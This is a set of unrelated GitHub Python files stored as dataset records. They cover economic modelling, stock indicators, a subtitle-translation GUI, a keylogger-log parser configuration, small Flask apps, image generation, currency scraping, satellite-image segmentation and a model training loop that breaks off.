mu_y_star, Sigma_x_star, Sigma_y_star\n\n def geometric_sums(self, beta, x_t):\n r\"\"\"\n Forecast the geometric sums\n\n .. math::\n\n S_x := E \\Big[ \\sum_{j=0}^{\\infty} \\beta^j x_{t+j} | x_t \\Big]\n\n S_y := E \\Big[ \\sum_{j=0}^{\\infty} \\beta^j y_{t+j} | x_t \\Big]\n\n Parameters\n ----------\n beta : scalar(float)\n Discount factor, in [0, 1)\n\n beta : array_like(float)\n The term x_t for conditioning\n\n Returns\n -------\n S_x : array_like(float)\n Geometric sum as defined above\n\n S_y : array_like(float)\n Geometric sum as defined above\n\n \"\"\"\n\n I = np.identity(self.n)\n S_x = solve(I - beta * self.A, x_t)\n S_y = self.G.dot(S_x)\n\n return S_x, S_y\n\n def impulse_response(self, j=5):\n r\"\"\"\n Pulls off the imuplse response coefficients to a shock\n in :math:`w_{t}` for :math:`x` and :math:`y`\n\n Important to note: We are uninterested in the shocks to\n v for this method\n\n * :math:`x` coefficients are :math:`C, AC, A^2 C...`\n * :math:`y` coefficients are :math:`GC, GAC, GA^2C...`\n\n Parameters\n ----------\n j : Scalar(int)\n Number of coefficients that we want\n\n Returns\n -------\n xcoef : list(array_like(float, 2))\n The coefficients for x\n ycoef : list(array_like(float, 2))\n The coefficients for y\n \"\"\"\n # Pull out matrices\n A, C, G, H = self.A, self.C, self.G, self.H\n Apower = np.copy(A)\n\n # Create room for coefficients\n xcoef = [C]\n ycoef = [np.dot(G, C)]\n\n for i in range(j):\n xcoef.append(np.dot(Apower, C))\n ycoef.append(np.dot(G, np.dot(Apower, C)))\n Apower = np.dot(Apower, A)\n\n return xcoef, ycoef\n","repo_name":"pmnyc/Source_Codes_Collected","sub_path":"QuantEconpy_quantitative economic modeling/quantecon/lss.py","file_name":"lss.py","file_ext":"py","file_size_in_byte":13108,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"8"} +{"seq_id":"39923349316","text":"\nimport pandas as pd\nimport sqlite3 as sql\nimport sys\nsys.path.append('/Users/yunongwu/Documents/Portfolio_Intelligence/Code/')\nconn = sql.connect('/Users/yunongwu/Nustore 
Files/PI/data/data.db')\nc = conn.cursor()\nc.execute(\"select * from stocks_price\")\n\nprice = pd.DataFrame(c.fetchall())\nprice.columns =['Date','Open','Close','High','Low','Volume','Code']\n# a=price.loc[(price['Code']=='000517')|(price['Code']=='600399')]\nb=price.sort_values(by=['Code','Date'])\nb['Date'] = pd.DatetimeIndex(b['Date'])\nb = b.set_index('Date')\n\ndef rsi6(ClosePrice,n=6):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n    up, down=change.copy(),change.copy()\n    up[up<0]=0\n    down[down>0]=0\n    RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n    RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n    RS=RolUp/RolDown\n    rsi=100-(100/(1+RS))\n    return round(rsi,2)\n\nrsi6=b.groupby('Code')[['Close']].apply(rsi6).reset_index()\nrsi6=rsi6.rename(columns={'Close':'RSI6'})\n\ndef rsi12(ClosePrice,n=12):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n    up, down=change.copy(),change.copy()\n    up[up<0]=0\n    down[down>0]=0\n    RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n    RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n    RS=RolUp/RolDown\n    rsi=100-(100/(1+RS))\n    return round(rsi,2)\n\nrsi12=b.groupby('Code')[['Close']].apply(rsi12).reset_index()\nrsi12=rsi12.rename(columns={'Close':'RSI12'})\n\ndef rsi24(ClosePrice,n=24):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    change=(ClosePrice-ClosePrice.shift(1)).fillna(0)\n    up, down=change.copy(),change.copy()\n    up[up<0]=0\n    down[down>0]=0\n    RolUp=up.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean()\n    RolDown=down.ewm(ignore_na=False,adjust=True,alpha=1/n,min_periods=0).mean().abs()\n    RS=RolUp/RolDown\n    rsi=100-(100/(1+RS))\n    return round(rsi,2)\n\nrsi24=b.groupby('Code')[['Close']].apply(rsi24).reset_index()\nrsi24=rsi24.rename(columns={'Close':'RSI24'})\n\n#Simple Moving Average\ndef sma5(ClosePrice,n=5):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    ma=ClosePrice.copy()\n    ma5=ma.rolling(window=n,center=False).mean()\n    return round(ma5,2)\n\nsma5=b.groupby('Code')[['Close']].apply(sma5).reset_index()\nsma5=sma5.rename(columns={'Close':'SMA5'})\n\ndef sma10(ClosePrice,n=10):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    ma=ClosePrice.copy()\n    ma10=ma.rolling(window=n,center=False).mean()\n    return round(ma10,2)\n\nsma10=b.groupby('Code')[['Close']].apply(sma10).reset_index()\nsma10=sma10.rename(columns={'Close':'SMA10'})\n\ndef sma20(ClosePrice,n=20):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    ma=ClosePrice.copy()\n    ma20=ma.rolling(window=n,center=False).mean()\n    return round(ma20,2)\n\nsma20=b.groupby('Code')[['Close']].apply(sma20).reset_index()\nsma20=sma20.rename(columns={'Close':'SMA20'})\n\ndef sma30(ClosePrice,n=30):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    ma=ClosePrice.copy()\n    ma30=ma.rolling(window=n,center=False).mean()\n    return round(ma30,2)\n\nsma30=b.groupby('Code')[['Close']].apply(sma30).reset_index()\nsma30=sma30.rename(columns={'Close':'SMA30'})\n\ndef sma60(ClosePrice,n=60):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    ma=ClosePrice.copy()\n    ma60=ma.rolling(window=n,center=False).mean()\n    return round(ma60,2)\n\nsma60=b.groupby('Code')[['Close']].apply(sma60).reset_index()\nsma60=sma60.rename(columns={'Close':'SMA60'})\n\n#High/Low\ndef pre20high(ClosePrice,n=20):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    pre=ClosePrice.copy()\n    pre20high=pre.rolling(window=n).max()\n    return 
round(pre20high,2)\n\npre20high=b.groupby('Code')[['Close']].apply(pre20high).reset_index()\npre20high=pre20high.rename(columns={'Close':'20HIGH'})\n\ndef pre20low(ClosePrice,n=20):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    pre=ClosePrice.copy()\n    pre20low=pre.rolling(window=n).min()\n    return round(pre20low,2)\n\npre20low=b.groupby('Code')[['Close']].apply(pre20low).reset_index()\npre20low=pre20low.rename(columns={'Close':'20LOW'})\n\ndef pre50high(ClosePrice,n=50):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    pre=ClosePrice.copy()\n    pre50high=pre.rolling(window=n).max()\n    return round(pre50high,2)\n\npre50high=b.groupby('Code')[['Close']].apply(pre50high).reset_index()\npre50high=pre50high.rename(columns={'Close':'50HIGH'})\n\ndef pre50low(ClosePrice,n=50):\n    ClosePrice=pd.DataFrame(ClosePrice)\n    pre=ClosePrice.copy()\n    pre50low=pre.rolling(window=n).min()\n    return round(pre50low,2)\n\npre50low=b.groupby('Code')[['Close']].apply(pre50low).reset_index()\npre50low=pre50low.rename(columns={'Close':'50LOW'})\n\n#Gap\ndef gap(ClosePrice):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    gap = ClosePrice['Open']-ClosePrice['Close'].shift(1) \n    gap = pd.DataFrame({'GAP':gap})\n    gap = gap.copy() \n    return round(gap,2)\ngap=b.groupby('Code').apply(gap).reset_index()\n\n#Close Price Change\ndef closechange(ClosePrice):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    change = ClosePrice['Close']-ClosePrice['Close'].shift(1) \n    change = pd.DataFrame({'CloseChange':change})\n    change = change.copy() \n    return round(change,2)\nclosechange=b.groupby('Code').apply(closechange).reset_index()\n\n#Change from Open\ndef changefromopen(ClosePrice):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    change = ClosePrice['Close']-ClosePrice['Open']\n    change = pd.DataFrame({'ChangeFromOpen':change})\n    change = change.copy() \n    return round(change,2)\nchangefromopen=b.groupby('Code').apply(changefromopen).reset_index()\n\n#Amplitude\ndef amplitude(ClosePrice):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    amplitude = round(100*(ClosePrice['High']-ClosePrice['Low'])/ClosePrice['Close'].shift(1),4)\n    amplitude = pd.DataFrame({'Amplitude%':amplitude})\n    amplitude = amplitude.copy()\n    return amplitude\n\namplitude=b.groupby('Code').apply(amplitude).reset_index()\n\n#HighLowRange\ndef HighLowRange(ClosePrice):\n    ClosePrice = pd.DataFrame(ClosePrice)\n    ClosePrice['Close_Shift'] = ClosePrice.groupby('Code').shift(1)['Close']\n    ClosePrice['High_Range%'] = 100*round((ClosePrice['Close_Shift']-ClosePrice['High']).abs()/ClosePrice['Close_Shift'],4)\n    ClosePrice['Low_Range%'] = 100*round((ClosePrice['Close_Shift']-ClosePrice['Low']).abs()/ClosePrice['Close_Shift'],4) \n    return ClosePrice[['Code', 'High_Range%', 'Low_Range%']]\n\nhighlowrange=HighLowRange(b).reset_index()\n\nhighlowrange.loc[(highlowrange['High_Range%'] > 11) | (highlowrange['Low_Range%'] > 11)]\n\n#MACD\ndef MACD(ClosePrice, nslow=26, nfast=12, nma=9):\n    ClosePrice = pd.DataFrame(ClosePrice) \n    emaslow = ClosePrice[\"Close\"].ewm(ignore_na=False,span=nslow, min_periods=0,adjust=True).mean()\n    emafast = ClosePrice[\"Close\"].ewm(ignore_na=False,span=nfast, min_periods=0,adjust=True).mean()\n    diff = emafast - emaslow\n    dea = diff.ewm(ignore_na=False,span=nma, min_periods=0,adjust=True).mean()\n    macd = 2*(diff - dea)\n    result = pd.DataFrame({'MACD_DIFF': round(emafast-emaslow,2),'MACD_DEA':round(dea,2),'MACD':round(macd,2)})\n    result = result.copy()\n    return result\n\nMACD=b.groupby('Code')[['Close']].apply(MACD).reset_index()\n\n\ndfs = 
[rsi6,rsi12,rsi24,sma5,sma10,sma20,sma30,sma60,pre20high,pre20low,pre50high,pre50low,gap,closechange,changefromopen,amplitude,highlowrange,MACD]\nfrom functools import reduce\ndf_final = reduce(lambda left,right: pd.merge(left,right,on=['Code','Date']), dfs)\n\ndf_final.to_sql(con=conn, name='technical', if_exists='replace')\nconn.commit()\n\nconn.close()","repo_name":"grassriver/Zhidao","sub_path":"tec index.py","file_name":"tec index.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"33942868596","text":"from mtranslate import translate\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QListWidgetItem, QTableWidgetItem, QFontDialog\nfrom PyQt5.QtCore import QTimer, Qt\nfrom PyQt5.QtGui import QFont\nfrom template import Ui_MainWindow\nfrom srtparse import get_subtitles\n\nclass SubLearn(QMainWindow):\n def __init__(self):\n super(SubLearn, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.app_variable()\n self.bind_signal()\n\n def app_variable(self):\n self.timer = QTimer()\n self.timer.setInterval(1000)\n self.font = QFont(\"Arial\", 15)\n \n def bind_signal(self):\n self.ui.open_button.clicked.connect(self.open_file)\n self.ui.font_button.clicked.connect(self.set_font)\n self.ui.next_button.clicked.connect(self.next_item)\n self.ui.previous_button.clicked.connect(self.previous_item)\n self.ui.tableSub.itemSelectionChanged.connect(self.select_subtitle)\n self.ui.listWord.itemSelectionChanged.connect(self.update_lineEdit)\n self.ui.listSentences.itemSelectionChanged.connect(self.update_lineEdit_Sentences)\n self.ui.hold_word_lineEdit.textChanged.connect(self.timer_update)\n self.timer.timeout.connect(self.translate_and_write)\n \n def open_file(self):\n filedialog = QFileDialog()\n filedialog.setFileMode(QFileDialog.AnyFile)\n url = filedialog.getOpenFileName(filter=(\"*.srt\"))[0]\n self.add_item_tableSub(url) if url != \"\" else \"\"\n del filedialog\n \n def set_font(self):\n fontdialog = QFontDialog()\n fontdialog.exec()\n font = fontdialog.selectedFont()\n self.font = font\n self.update_font()\n return font\n \n def update_font(self):\n all_table_items = self.ui.tableSub.findItems(\"\", Qt.MatchContains)\n for i in all_table_items: i.setFont(self.font)\n\n def next_item(self):\n try:\n selected_row = self.ui.tableSub.currentRow()\n self.ui.tableSub.setCurrentCell(selected_row + 1, 0)\n except AttributeError:\n pass\n\n def previous_item(self):\n try:\n selected_row = self.ui.tableSub.currentRow()\n self.ui.tableSub.setCurrentCell(selected_row - 1, 0)\n except AttributeError:\n pass\n \n def add_item_tableSub(self, file):\n self.ui.tableSub.setRowCount(0)\n sublist = get_subtitles(file)\n for i in sublist:\n rowPosition = self.ui.tableSub.rowCount()\n self.ui.tableSub.insertRow(rowPosition)\n item = QTableWidgetItem(i.content)\n item.setFont(self.font)\n self.ui.tableSub.setItem(rowPosition, 0, item)\n self.ui.tableSub.resizeRowsToContents()\n \n def select_subtitle(self):\n try:\n text = self.ui.tableSub.currentItem().text()\n self.update_listWord(text)\n except AttributeError:\n pass\n \n def select_sentences(self, item):\n text = item.text()\n self.ui.hold_word_lineEdit.setText(text)\n \n def update_listWord(self, text):\n self.ui.listWord.clear()\n self.ui.listSentences.clear()\n word_list = []\n sentences = text.split(\"\\n\")\n for i in sentences:\n for word in i.split(\" \"):\n word_list.append(word)\n for i in word_list:\n 
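# wrap each word in its own QListWidgetItem so the chosen font can be applied per item\n            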
word_item = QListWidgetItem()\n word_item.setFont(self.font)\n word_item.setText(i)\n self.ui.listWord.addItem(word_item)\n for i in sentences:\n sentences_item = QListWidgetItem()\n sentences_item.setFont(self.font)\n sentences_item.setText(i)\n self.ui.listSentences.addItem(sentences_item)\n \n def update_lineEdit(self):\n text = \"\"\n for i in self.ui.listWord.selectedItems():\n text += (\" \" + i.text())\n \n self.ui.hold_word_lineEdit.setFont(self.font)\n self.ui.hold_word_lineEdit.setText(text.strip())\n \n def update_lineEdit_Sentences(self):\n text = \"\"\n for i in self.ui.listSentences.selectedItems():\n text += (\" \" + i.text())\n \n self.ui.hold_word_lineEdit.setFont(self.font)\n self.ui.hold_word_lineEdit.setText(text.strip())\n\n def timer_update(self, text):\n self.timer.stop()\n self.ui.translateArea.setPlainText(\"Please wait...\")\n self.timer.start()\n\n def translate_and_write(self):\n self.timer.stop()\n text = self.ui.hold_word_lineEdit.text()\n trans_text = translate(text, \"tr\", \"auto\")\n self.ui.translateArea.setFont(self.font)\n self.ui.translateArea.setPlainText(trans_text)\n\nif __name__ == \"__main__\":\n app = QApplication([])\n window = SubLearn()\n window.show()\n app.exec()","repo_name":"acarokan/SubLearn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"21549202006","text":"import os\nimport subprocess\n\nfrom engine.parser import Parser\n\n\nclass PyKeyloggerParser(Parser):\n\n def __init__(self, collector):\n super(PyKeyloggerParser, self).__init__(collector)\n self.click_dir = os.path.join(self.file_or_dir, \"click_images\")\n self.timed_dir = os.path.join(self.file_or_dir, \"timed_screenshots\")\n self.file_or_dir = os.path.join(self.file_or_dir, \"detailed_log\", \"logfile.txt\")\n if os.name == 'nt':\n self.script_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"keylogger_parser.bat\")\n else:\n self.script_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"keylogger_parser.sh\")\n self.parserInputs = [self.script_file, self.file_or_dir, self.parsed_folder, self.click_dir, self.timed_dir]\n\n","repo_name":"ARL-UTEP-OC/ecel","sub_path":"plugins/parsers/pykeylogger/pykeylogger_parser.py","file_name":"pykeylogger_parser.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"8"} +{"seq_id":"35789123197","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/report')\ndef report():\n #To get the args passed in our html form\n # The 3 conditions to check (start as False)\n has_upper = False\n has_lower = False\n has_num = False\n name = request.args.get('name')\n\n has_lower = any(letter.islower() for letter in name)\n has_upper = any(letter.isupper() for letter in name)\n has_num = name[-1].isdigit()\n # Check if all are True.\n report = has_upper and has_lower and has_num\n\n return render_template('report.html', name = name,has_upper = has_upper,has_lower = has_lower, has_num = has_num,report = report)\n\n\n\n\nif __name__=='__main__':\n 
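#Start the Flask development server (debug mode reloads on change and shows tracebacks)\n    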
app.run(debug=True)","repo_name":"NyakioMuriuki/Flask_Projects","sub_path":"username_authenticator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4584819224","text":"from PIL import Image,ImageFont, ImageDraw\nimport textwrap\nimport os \nimport shutil\n\ndata_directory = \"news_data\"\nimg_directory = \"image_data\"\n\nif os.path.exists(img_directory):\n\tshutil.rmtree(img_directory)\n\n#Recreating the Directory.\nos.mkdir(img_directory)\n\nnews_data = []\nnews_title = []\n\n#Function to Append the Data from File to the Array Placeholders.\ndef append_data_onto_array(data_file, title_files):\n\twith open(data_file, \"r\") as r:\n\t\tfor lines in r.read().split(\"\\n\"):\n\t\t\tnews_data.append(lines)\n\n\twith open(title_files, \"r\") as r:\n\t\tfor lines in r.read().split(\"\\n\"):\n\t\t\tnews_title.append(lines)\n\nappend_data_onto_array(data_file=f\"{data_directory}/news.txt\", title_files=f\"{data_directory}/titles.txt\")\n#Removing the Last Element from the Array.\ndel news_data[-1], news_title[-1]\n\ndef image_writer(text_data, text_title):\n\tfont_type_title = ImageFont.truetype(\"OpenSans-LightItalic.ttf\",45)\n\t#image = Image.open(\"carbon.png\")\n\tfont_type = ImageFont.truetype(\"OpenSans-Light.ttf\",45)\n\n\t#Pair each article with its matching title and render exactly one image per pair.\n\tfor idx, (data_s, data_t) in enumerate(zip(text_data, text_title)):\n\n\t\timage = Image.open(\"carbon.png\")\n\t\tdraw = ImageDraw.Draw(image)\n\n\t\ttext = textwrap.fill(data_s,width=55)\n\n\t\tw,h = font_type.getsize(text)\n\t\tdraw.text(xy=(650,100), text=data_t, font=font_type_title)\n\t\tdraw.text(xy=(200,200),text=text,fill=(0,171,169),font=font_type)\n\t\timage.save(f\"{img_directory}/image_{idx}.png\")\n\nimage_writer(text_data=news_data, text_title=news_title)\n\n","repo_name":"harsath/Byte-News--A-Twitter-News-bot-from-The-Hindu-API","sub_path":"image_create.py","file_name":"image_create.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"37064581410","text":"def Dyn_Curr(CurrFrom, CurrTo):\r\n\r\n\t#Web Crawling\r\n\timport urllib2\r\n\tsURL ='https://www.google.com/finance/converter?a=1&from=' + CurrFrom + '&to=' + CurrTo\r\n\thtml = urllib2.urlopen(sURL)\r\n\tByteData = html.read()\r\n\t\r\n\t#Crawled data as 1D array of string\r\n\tStrData = ByteData.decode(\"ISO-8859-1\").strip().split('\\n')\r\n\t\r\n\t#Extract Currency from the string array\r\n\tNumLine = len(StrData)\r\n\tfor i in range(0,NumLine):\r\n \t\tif StrData[i][0:34] == '
':\r\n \t\t\tLineCurrency=StrData[i]\r\n\r\n\tPosStartText = ''\r\n\tPosEndText = ''\r\n\tLenPosStart = len(PosStartText)\r\n\tLenPosEnd = len(PosEndText)\r\n\tPosStart = (LineCurrency.find(PosStartText) + LenPosStart) - len(LineCurrency)\r\n\tPosEnd = LineCurrency.find(PosEndText)-4\r\n\tCurr = LineCurrency[PosStart:PosEnd]\r\n\tCurr = float(Curr)\r\n\treturn Curr","repo_name":"funkyong13/PlotTrend","sub_path":"PT_PythonBackEnd/Feature1_Historical Date Crawl/Final/Def_Dynamic_Currency.py","file_name":"Def_Dynamic_Currency.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"33119583504","text":"import os\n\nfrom iota2.Steps import IOTA2Step\nfrom iota2.Cluster import get_RAM\nfrom iota2.Common import ServiceConfigFile as SCF\n\n\nclass slicSegmentation(IOTA2Step.Step):\n    def __init__(self, cfg, cfg_resources_file, workingDirectory=None):\n        # heritage init\n        resources_block_name = \"slic_segmentation\"\n        super(slicSegmentation, self).__init__(cfg, cfg_resources_file,\n                                               resources_block_name)\n\n        # step variables\n        self.RAM = 1024.0 * get_RAM(self.resources[\"ram\"])\n        self.workingDirectory = workingDirectory\n\n    def step_description(self):\n        \"\"\"\n        function used to print a short description of the step's purpose\n        \"\"\"\n        description = (\"Compute SLIC segmentation by tile\")\n        #~ About SLIC segmentation implementation :\n        #~ https://ieeexplore.ieee.org/document/8606448\n        return description\n\n    def step_inputs(self):\n        \"\"\"\n        Return\n        ------\n        the return could be an iterable or a callable\n        \"\"\"\n        tiles = SCF.serviceConfigFile(self.cfg).getParam('chain',\n                                                         'listTile').split(\" \")\n        return tiles\n\n    def step_execute(self):\n        \"\"\"\n        Return\n        ------\n        lambda\n            the function to execute as a lambda function. 
The returned object\n            must be a lambda function.\n        \"\"\"\n        from iota2.Segmentation import segmentation\n        from iota2.Common.ServiceConfigFile import iota2_parameters\n\n        running_parameters = iota2_parameters(self.cfg)\n\n        step_function = lambda x: segmentation.slicSegmentation(\n            x,\n            SCF.serviceConfigFile(self.cfg).getParam('chain', 'outputPath'),\n            running_parameters.get_sensors_parameters(x), self.RAM, self.\n            workingDirectory)\n        return step_function\n\n    def step_outputs(self):\n        \"\"\"\n        \"\"\"\n        pass\n","repo_name":"inglada/iota2","sub_path":"iota2/Steps/slicSegmentation.py","file_name":"slicSegmentation.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"42465372423","text":"''' \nThe Chatbot\n\nauthor: Sawyer\n'''\n\nfrom flask import Flask\nfrom flask import render_template, redirect, request\nimport ast\nimport random\n\nconversation = {}\n\napp = Flask(__name__)\n\n@app.route('/', methods = ['POST', 'GET'])\ndef pick_nickname_and_password():\n\treturn render_template('pick_nickname.html')\n\n@app.route('/redirect', methods = ['POST', 'GET'])\ndef get_nickname_and_redirect():\n\tnickname = str(request.form['nickname'])\n\tpassword = str(request.form['password'])\n\tif check_password(nickname, password):\n\t\turl = '/converse/'+nickname\n\t\treturn redirect(url)\n\treturn redirect('/')\n\n@app.route('/converse/<nickname>', methods = ['POST', 'GET'])\ndef index(nickname):\n\tresponses = []\n\tif nickname in conversation:\n\t\tresponses = conversation[nickname]\n\treturn render_template('main.html', nickname=nickname, responses=responses)\n\n@app.route('/respond/<nickname>', methods = ['POST', 'GET'])\ndef respond(nickname):\n\ttry:\n\t\tsearch = str(request.form['searchkey'])\n\t\ttext = take_input(search, nickname)\n\texcept:\n\t\tpass\n\turl = '/converse/'+nickname\n\treturn redirect(url)\n\n@app.route('/add_response/<nickname>/<post>', methods = ['POST', 'GET'])\ndef add_response_from_user(nickname, post):\n\tvalue = str(request.form['suggestion'])\n\tadd_entry(str(post), value)\n\tremove_from_unresponded(post)\n\turl = '/converse/'+nickname\n\treturn redirect(url)\n\n@app.route('/logout/<nickname>', methods = ['POST', 'GET'])\ndef logout(nickname):\n\tclear_conversation(nickname)\n\treturn redirect('/')\n\n@app.route('/make_responses', methods = ['POST', 'GET'])\ndef suggest_responses():\n\tunanswered = make_unresponded_list()\n\treturn render_template('help.html', unanswered=unanswered)\n\n@app.route('/alternate_help/<post>', methods = ['POST', 'GET'])\ndef add_alternate_help(post):\n\tadd_to_unresponded_alternate(post)\n\turl = '/make_responses'\n\treturn redirect(url)\n\n@app.route('/add_response_help/<post>', methods = ['POST', 'GET'])\ndef add_response_help(post):\n\tvalue = str(request.form['suggestion'])\n\tadd_entry(str(post), value)\n\tremove_from_unresponded(post)\n\turl = '/make_responses'\n\treturn redirect(url)\n\ndef check_password(user, password):\n\tf = open('users.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\tif user not in y:\n\t\tadd_user(user, password)\n\t\treturn True\n\tif y[user] == password:\n\t\treturn True\n\treturn False\n\ndef add_user(user, password):\n\tf = open('users.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\ty[user] = password\n\tz = str(y)\n\tnew_file = open('users.txt', 'w')\n\tnew_file.write(z)\n\tnew_file.close()\n\ndef add_entry(key, value):\n\tf = open('responses.txt', 'r+')\n\tx = f.read()\n\ty = ast.literal_eval(x)\n\tif key not in y:\n\t\ty[key] = []\n
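\t# store each response only once per prompt\n\tif value not 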
in y[key]:\n\t\ty[key].append(value)\n\tz = str(y)\n\tnew_file = open('responses.txt', 'w')\n\tnew_file.write(z)\n\tnew_file.close()\n\ndef make_dictionary():\n\tf = open('responses.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_unresponded_list():\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_alternate_dictionary():\n\tf = open('alternate.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_alternate_list():\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef find_response(key):\n\tdictionary = make_dictionary()\n\tif key in dictionary:\n\t\treturn pick_from_responses(dictionary[key])\n\tadd_to_unresponded(key)\n\treturn None\n\ndef pick_from_responses(l):\n\tif type(l) == list:\n\t\tlength = len(l)\n\t\tindex = random.randint(0,length-1)\n\t\treturn l[index]\n\ndef add_to_unresponded(key):\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif key not in l:\n\t\tl.append(key)\n\tl = str(l)\n\tnew_file = open('unresponded.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef remove_from_unresponded(key):\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif key in l:\n\t\tl.remove(key)\n\tl = str(l)\n\tnew_file = open('unresponded.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef take_input(key, user):\n\tresponse = Response(key, 'user')\n\tif user in conversation:\n\t\tconversation[user].append(response)\n\telse:\n\t\tconversation[user] = []\n\t\tconversation[user].append(response)\n\tif key in make_alternate_dictionary():\n\t\tres = make_alternate_response(key)\n\telse:\n\t\tres = find_response(key)\n\tif res == None:\n\t\tres = \"Sorry, we don't have a response for that yet\"\n\tresponse = Response(res, 'chatbot')\n\tconversation[user].append(response)\t\n\treturn res\n\ndef clear_conversation(user):\n\tconversation[user] = []\n\ndef add_to_unresponded_alternate(message):\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif message not in l:\n\t\tl.append(str(message))\n\tl = str(l)\n\tnew_file = open('unresponded_alternate.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef remove_from_unresponded_alternate(message):\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif message in l:\n\t\tl.remove(message)\n\tl = str(l)\n\tnew_file = open('unresponded_alternate.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef make_alternate_response(key):\n\td = make_alternate_dictionary()\n\tif key not in d:\n\t\treturn None\n\tfunction = d[key]\n\tif function == 'something':\n\t\treturn something()\n\ndef add_alternate_function(key, function):\n\tf = open('alternate.txt', 'r+')\n\tx = f.read()\n\td = ast.literal_eval(x)\n\tif key not in d:\n\t\td[key] = function\n\td = str(d)\n\tnew_file = open('alternate.txt', 'w')\n\tnew_file.write(d)\n\tnew_file.close()\n\tremove_from_unresponded_alternate(key)\n\nclass Response:\n\tdef __init__(self, text, speaker):\n\t\tself.text = text\n\t\tself.speaker = speaker\n\ndef something():\n\treturn 'hello again'\n\nif __name__ == '__main__':\n\tadd_alternate_function('something', 'something')\n\tapp.run()","repo_name":"panyang/chatbot-1","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} 
+{"seq_id":"43042560244","text":"#!/usr/bin/python3\n\nfrom queue import Queue\nfrom threading import Thread\n\nclass ClosableQueue(Queue):\n SENTINEL = object()\n\n def close(self):\n self.put(self.SENTINEL)\n\n def __iter__(self):\n while True:\n item = self.get()\n try:\n if item is self.SENTINEL:\n return # Cause the thread to exit\n yield item\n finally:\n self.task_done()\n\n\nclass Worker(Thread):\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.polled_count = 0\n self.work_done = 0\n\n def run(self):\n for item in self.in_queue:\n result = self.func(item)\n self.out_queue.put(result)\n","repo_name":"Jasper-Li/utils","sub_path":"multiThread/Worker.py","file_name":"Worker.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"26667561942","text":"import config\nimport torch\nfrom utils import print_metrics\ndevice = config.device\n\ndef loss_fun(outputs, targets):\n return torch.nn.BCEWithLogitsLoss()(outputs, targets)\n\n# function to validate the validation data from trained model\ndef validate(model, testLoader):\n model.eval()\n val_targets = []\n val_outputs = []\n with torch.no_grad():\n for _, data in enumerate(testLoader):\n ids = data['ids'].to(device, dtype=torch.long)\n mask = 